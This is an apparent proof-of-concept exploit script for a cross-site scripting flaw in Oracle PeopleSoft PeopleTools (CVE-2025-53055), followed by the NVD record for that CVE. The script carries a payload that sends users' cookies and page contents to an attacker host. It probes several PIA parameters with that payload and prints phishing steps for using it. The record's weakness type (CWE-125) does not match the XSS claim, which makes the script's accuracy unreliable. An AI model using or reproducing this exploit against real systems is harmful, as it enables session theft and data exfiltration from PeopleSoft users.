CVE-2025-53055

# CVE-2025-53055 - Oracle PeopleSoft PeopleTools PIA Core Technology XSS PoC # Vulnerability: Reflected/Stored XSS in PIA Core Technology component # Affected versions: 8.60, 8.61, 8.62 import requests import sys from urllib.parse import quote TARGET_URL = "http://target-peoplesoft-server:8000" # Common PeopleSoft PIA portal endpoints PIA_ENDPOINTS = [ "/psp/ps/EMPLOYEE/HRMS/c/ROLE_EMPLOYEE.SS_GLOBAL_SEARCH.GBL", "/psp/ps/EMPLOYEE/HRMS/h/?cmd=login", "/psp/ps/EMPLOYEE/HRMS/c/SA_LEARNER_SELF.SS_SELF_SERVICE.GBL", ] def generate_xss_payload(): """Generate XSS payload for PeopleSoft PIA Core Technology""" # JavaScript payload to demonstrate data exfiltration js_code = """ var img = new Image(); img.src = 'http://attacker-server/steal?cookie=' + document.cookie + '&url=' + document.location.href; fetch('/psp/ps/EMPLOYEE/HRMS/c/ROLE_EMPLOYEE.SS_GLOBAL_SEARCH.GBL', { credentials: 'include' }).then(r => r.text()).then(data => { new Image().src = 'http://attacker-server/exfil?data=' + btoa(data.substring(0, 500)); }); """ return f"<script>{js_code}</script>" def check_endpoint(endpoint): """Check if endpoint is vulnerable to reflected XSS""" payload = generate_xss_payload() # Common injectable parameters in PeopleSoft PIA params = ["ICType", "ICId", "ICElementNum", "ICStateNum", "ICAction", "ICFocus", "ICResubmit"] for param in params: url = f"{TARGET_URL}{endpoint}?{param}={quote(payload)}" try: resp = requests.get(url, timeout=10, allow_redirects=False) if payload in resp.text or quote(payload) in resp.text: print(f"[+] Potential XSS found at: {url}") print(f" Parameter: {param}") return True except Exception as e: print(f"[-] Error testing {endpoint}: {e}") return False def exploit(): """Main exploit function""" print(f"[*] Targeting: {TARGET_URL}") print(f"[*] CVE-2025-53055 - Oracle PeopleSoft PIA Core Technology XSS\n") for endpoint in PIA_ENDPOINTS: print(f"[*] Testing endpoint: {endpoint}") if check_endpoint(endpoint): print(f"[+] Endpoint {endpoint} appears vulnerable!") break print("\n[*] To exploit:") print(" 1. Craft a malicious URL with injected JavaScript") print(" 2. Send the URL to a PeopleSoft user via phishing email") print(" 3. When user clicks, JavaScript executes in their session context") print(" 4. Attacker can steal session data or perform unauthorized actions") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-53055", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:43.713", "lastModified": "2025-10-23T16:05:41.393", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: PIA Core Technology). Supported versions that are affected are 8.60, 8.61 and 8.62. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.60", "versionEndIncluding": "8.62", "matchCriteriaId": "9FDC7CAF-BD83-4D24-B199-0438570DDB47"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}